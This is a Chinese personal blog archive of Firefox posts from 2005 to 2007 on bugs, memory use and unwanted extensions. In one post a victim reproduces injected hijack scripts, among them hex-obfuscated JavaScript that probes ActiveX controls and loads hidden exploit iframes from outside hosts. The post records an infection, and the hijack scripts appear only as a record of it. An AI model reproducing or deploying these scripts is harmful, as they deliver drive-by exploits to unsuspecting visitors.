Archive for the 'Firefox' Category

« Previous Entries

又被劫持

星期六, 6月 9th, 2007

因为遇到firefox无法下载文件无法管理的问题,重新下载了2.0.0.4英文版的安装了下,结果又遭遇劫持事件。

安装以后发现打开含有google adsense的页面全部还有第三方的JS,来自于y66.us。

PLAIN TEXT
HTML:
  1. <script src=http://y66.us/2.js></script>

打开这个JS,是一段框架代码

PLAIN TEXT
HTML:
  1. document.writeln("<script src=\"http:\/\/y66.us\/oK\/Vernum.js\"><\/script>");
  2. document.writeln("</script><script>");
  3. document.writeln("function Start(){");
  4. document.writeln("var Then = new Date() ");
  5. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
  6. document.writeln("var cookieString = new String(document.cookie)");
  7. document.writeln("var cookieHeader = \"Cookie1=\" ");
  8. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
  9. document.writeln("if (beginPosition != -1){ ");
  10. document.writeln("} else ");
  11. document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
  12. document.writeln("document.writeln(\"<iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
  13. document.writeln("document.writeln(\"</iframe><iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
  14. document.writeln("}");
  15. document.writeln("}");
  16. document.writeln("Start();");
  17. document.writeln("<\/script>")

感觉这段代码不会对我的电脑带来任何益处,询问了下,不是google adsense的问题,那就是我的浏览器出了问题。立即把firefox的所有缓存都清除,并卸载了firefox,整机杀了下毒,并没发现什么。重新下载安装中文版的,一切又恢复了正常。 :?
比较奇怪,一直比较谨慎,安装了no script,很少会自动运行不正常网站的代码,也不知道是在哪中招了。

暂时可以使用Anti ARP Sniffer预防这一问题。

2007.10.18 Update: 今天又碰到类似的劫持
js来自

PLAIN TEXT
HTML:
  1. <script src=http://rb.vg/1.js></script>

JS代码为

PLAIN TEXT
HTML:
  1. var vDA1 = new window["\x44\x61\x74\x65"]()
  2. vDA1["\x73\x65\x74\x54\x69\x6d\x65"](vDA1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
  3. var eOTo$2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
  4. var eZT3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
  5. var VMliYvVKu4 = eOTo$2["\x69\x6e\x64\x65\x78\x4f\x66"](eZT3)
  6. if (VMliYvVKu4 == -1)
  7. {
  8. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x44\x4f\x53\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ vDA1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
  9. try{if(new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\/\/\x4e\x6f\x50\x2e\x67\x73\/\x73\x33\x36\x38\/\x4e\x65\x77\x4a\x73\x31\x2e\x6a\x73\x22\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e');}catch(e){} // ms06014
  10. try{if(new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x74\x33\x36\x38\x6f\x6b\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // XL
  11. try{if(new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x47\x6f\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // BF
  12. try{if(new ActiveXObject("\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x54\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // PPS
  13. try{if(new ActiveXObject("\x50\x64\x67\x32"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x72\x65\x61\x64\x65\x72\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // CX
  14. try{if(new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x4c\x69\x6e\x6b\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // LZ
  15. try{if(new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x50\x69\x63\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // Baidu
  16. }

疑为局域网ARP病毒。

Technorati Tags: ,

Posted in Firefox, 互联网 | 2 Comments »

Firefox2.0.0.4的bug

星期三, 6月 6th, 2007

升级这个版本的firefox已经几周了,一直使用良好,但最近突然发现有个下载图片的bug。

当然保存图片到本地是,发现它根本没有储存
Firefox2.0.0.4下载图片bug

就算你在设置里把储存图片的路径设置好,还是保存不了。不知道是否有人也有类似问题,还是就我个人的问题。 :?

Technorati Tags: , ,

Posted in Firefox, 互联网 | 1 Comment »

FireFox2.0

星期一, 10月 30th, 2006

刚试装了一下Firefox2.0,都说性能上提高很多,但我这启动速度提高并不明显,可能是机器配置低的缘故。界面上改变也不多,背景色换了下,原来的extension变 成了现在的add-on,当然使用新版,有部分extension就无法使用了。选用的是英文版,字符占用的地方小,tool folder上可以放十多个常用连接。

都说FireFox2.0是针对微软的IE7.0而发布的,界面上表现的最明显的tab上都有独立的关闭按钮。使用FireFox都是因为较之于IE来说,安全性能更高些。大部分的流氓插件都是针对IE开发的,FireFox很少遭受此类侵扰。

刚发现2.0有个纠错功能,英文版上比较明显,当你写错一个单词,下面就会出现一条红色横线,类似于word。对于其他新功能来说,此类功能更人性化。

Technorati Tags:

Posted in Firefox | 2 Comments »

Firefox也不干净了

星期二, 10月 17th, 2006

不知什么时候Firefox里多了一个extension,来自于迅雷,只要你点到下载连接就直接跳出软件,我感谢它这么“殷勤”,可是不是每个连接我都需要用它下载的,或者说不是每个连接它都能下载的,当我想另存为时仍然被它照单全收,于是删除了它,可问题来了,每次重启电脑以后,Firefox还是有迅雷的extension,卸载了几次都是如此,这不是强盗么,不管下载还是浏览网页,自己都比较谨慎,一般不会中招。

不过这并不奇怪,以为迅雷已被多家下载网站屏蔽,真因它出自流氓软件之父3721原总裁之手(应该说是他投资的),而电脑报上大篇幅声讨流氓软件时3721总是遥遥领先。

注:不是卸载不了,只是每次打开firefox时用迅雷下载东西,它就会偷偷给你按上。

Technorati Tags: ,

Posted in Firefox, 互联网, 生活感悟 | 2 Comments »

Firefox的DNS解析问题

星期一, 5月 8th, 2006

最近发现Firefox老出现dns解析的bug,IE明明可以访问,可到了Firefox这就无法解析,有些php脚本的网站会提示下载或者短时间白屏。

内存占用高的老问题似乎还是存在,还有就是很某些plugins冲突导致意外关闭。

最近喜欢上英文版的Firefox,字母少,看着也清爽,汉字一多,看着就头疼。

Technorati Tags: , ,

Posted in Firefox, 生活感悟 | No Comments »

Firefox又开始变慢

星期一, 2月 13th, 2006

升级到1.5.1以后,打开速度明显变慢,从启动到完全打开最少得15秒,打开多个页面已经负赘不堪,相同配置的机器,使用IE就显得快很多,至少打开只需要1秒,多个页面也没感觉很负赘。不得已,只能再此使用IE,暂时放弃Firefox

Technorati Tags:

Posted in Firefox, 互联网 | No Comments »

No Script

星期二, 12月 20th, 2005

前几天51.la服务器被挂木马,部分使用它统计的用户被感染,它的统计我也使用了,也不知道有没有中招。不过前天已经重新做过系统。朋友推荐使用Noscript这个firefox的插件,禁止所用不可靠网站上js程序和js的调用。

被挂木马后会用写入计算机的程序,安装noscript后,所有写操作都是被禁止的,相对来说安全些。不过不足的是好像系统资源占得更多一些。

Technorati Tags: , ,

Posted in Firefox | No Comments »

Firefox狂吃内存

星期五, 12月 2nd, 2005

使用了几天Firefox后的感觉是,打开页面的速度是不错,不过内存吃的厉害,打开三个页面,一看,内存吃了30多M,要是开了十几个页面那还不得上百兆。三个页面机器就开始顿了(本机配置比较烂,128的内存),最后成罢工状,无奈只能暂时放弃一下,用IE访问页面了。

Technorati Tags:

Posted in Firefox, 互联网 | No Comments »

« Previous Entries